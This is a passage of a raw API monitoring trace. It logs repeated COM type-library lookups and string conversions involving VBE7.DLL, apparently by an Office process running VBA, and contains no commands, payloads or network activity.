pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3b80, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0 | out: pBstrDllName=0x33e4fb3b80*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3ba0*=0x3e10) returned 0x0 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3b80, pwOrdinal=0x500000000) returned 0x0 [0060.591] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3c60, pIndex=0x0 | out: ppTLib=0x33e4fb3c60*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.591] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3c70, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3c70, pDummy=0x0) returned 0x0 [0060.591] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.591] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3c60, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3c60, pBstrName=0x0, pwOrdinal=0x33e4fb3c80 | out: pBstrDllName=0x33e4fb3c60*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3c80*=0x3ef0) returned 0x0 [0060.591] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3c60, pwOrdinal=0x500000000) returned 0x0 [0060.591] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3d40, pIndex=0x0 | out: ppTLib=0x33e4fb3d40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.591] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3d50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3d50, pDummy=0x0) returned 0x0 [0060.591] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.592] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.592] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3d40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.592] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3d40, pBstrName=0x0, pwOrdinal=0x33e4fb3d60 | out: pBstrDllName=0x33e4fb3d40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3d60*=0x3fd0) returned 0x0 [0060.592] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3d40, pwOrdinal=0x500000000) returned 0x0 [0060.592] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3e20, pIndex=0x0 | out: ppTLib=0x33e4fb3e20*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.595] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3e30, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3e30, pDummy=0x0) returned 0x0 [0060.595] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.595] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3e20, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3e20, pBstrName=0x0, pwOrdinal=0x33e4fb3e40 | out: pBstrDllName=0x33e4fb3e20*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3e40*=0x40b0) returned 0x0 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000) returned 0x0 [0060.595] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3f00, pIndex=0x0 | out: ppTLib=0x33e4fb3f00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.595] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3f10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3f10, pDummy=0x0) returned 0x0 [0060.595] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.595] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3f00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3f00, pBstrName=0x0, pwOrdinal=0x33e4fb3f20 | out: pBstrDllName=0x33e4fb3f00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3f20*=0x4190) returned 0x0 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000) returned 0x0 [0060.595] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3fe0, pIndex=0x0 | out: ppTLib=0x33e4fb3fe0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.595] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ff0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ff0, pDummy=0x0) returned 0x0 [0060.595] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.595] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3fe0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3fe0, pBstrName=0x0, pwOrdinal=0x33e4fb4000 | out: pBstrDllName=0x33e4fb3fe0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4000*=0x4270) returned 0x0 [0060.595] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000) returned 0x0 [0060.596] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb40c0, pIndex=0x0 | out: ppTLib=0x33e4fb40c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.596] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb40d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb40d0, pDummy=0x0) returned 0x0 [0060.596] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.596] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb40c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb40c0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0 | out: pBstrDllName=0x33e4fb40c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0*=0x4350) returned 0x0 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000) returned 0x0 [0060.596] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb41a0, pIndex=0x0 | out: ppTLib=0x33e4fb41a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.596] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb41b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb41b0, pDummy=0x0) returned 0x0 [0060.596] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.596] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb41a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb41a0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0 | out: pBstrDllName=0x33e4fb41a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0*=0x4430) returned 0x0 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000) returned 0x0 [0060.596] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4280, pIndex=0x0 | out: ppTLib=0x33e4fb4280*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.596] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4290, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4290, pDummy=0x0) returned 0x0 [0060.596] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.596] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4280, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4280, pBstrName=0x0, pwOrdinal=0x33e4fb42a0 | out: pBstrDllName=0x33e4fb4280*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42a0*=0x4510) returned 0x0 [0060.596] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000) returned 0x0 [0060.596] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4360, pIndex=0x0 | out: ppTLib=0x33e4fb4360*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.596] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4370, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4370, pDummy=0x0) returned 0x0 [0060.596] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.596] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4360, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4360, pBstrName=0x0, pwOrdinal=0x33e4fb4380 | out: pBstrDllName=0x33e4fb4360*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4380*=0x45f0) returned 0x0 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000) returned 0x0 [0060.597] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4440, pIndex=0x0 | out: ppTLib=0x33e4fb4440*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.597] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4450, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4450, pDummy=0x0) returned 0x0 [0060.597] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.597] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4440, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4440, pBstrName=0x0, pwOrdinal=0x33e4fb4460 | out: pBstrDllName=0x33e4fb4440*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4460*=0x46d0) returned 0x0 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000) returned 0x0 [0060.597] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbc8430, cb=0x1010) returned 0x1d39dbc8430 [0060.597] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4520, pIndex=0x0 | out: ppTLib=0x33e4fb4520*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.597] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4530, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4530, pDummy=0x0) returned 0x0 [0060.597] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.597] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4520, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4520, pBstrName=0x0, pwOrdinal=0x33e4fb4540 | out: pBstrDllName=0x33e4fb4520*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4540*=0x47b0) returned 0x0 [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000) returned 0x0 [0060.597] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2f40, pIndex=0x0 | out: ppTLib=0x33e4fb2f40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.597] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2f50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2f50, pDummy=0x0) returned 0x0 [0060.597] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.597] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.597] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2f40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2f40, pBstrName=0x0, pwOrdinal=0x33e4fb2f60 | out: pBstrDllName=0x33e4fb2f40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2f60*=0x31d0) returned 0x0 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000) returned 0x0 [0060.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2f40, pIndex=0x0 | out: ppTLib=0x33e4fb2f40*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.598] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2f50, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2f50, pDummy=0x0) returned 0x0 [0060.598] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.598] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2f40, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2f40, pBstrName=0x0, pwOrdinal=0x33e4fb2f60 | out: pBstrDllName=0x33e4fb2f40*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2f60*=0x31d0) returned 0x0 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2f40, pwOrdinal=0x500000000) returned 0x0 [0060.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3020, pIndex=0x0 | out: ppTLib=0x33e4fb3020*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.598] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3030, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3030, pDummy=0x0) returned 0x0 [0060.598] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.598] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3020, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3020, pBstrName=0x0, pwOrdinal=0x33e4fb3040 | out: pBstrDllName=0x33e4fb3020*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3040*=0x32b0) returned 0x0 [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3020, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3020, pwOrdinal=0x500000000) returned 0x0 [0060.598] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3100, pIndex=0x0 | out: ppTLib=0x33e4fb3100*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.598] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3110, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3110, pDummy=0x0) returned 0x0 [0060.598] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.598] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.598] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3100, 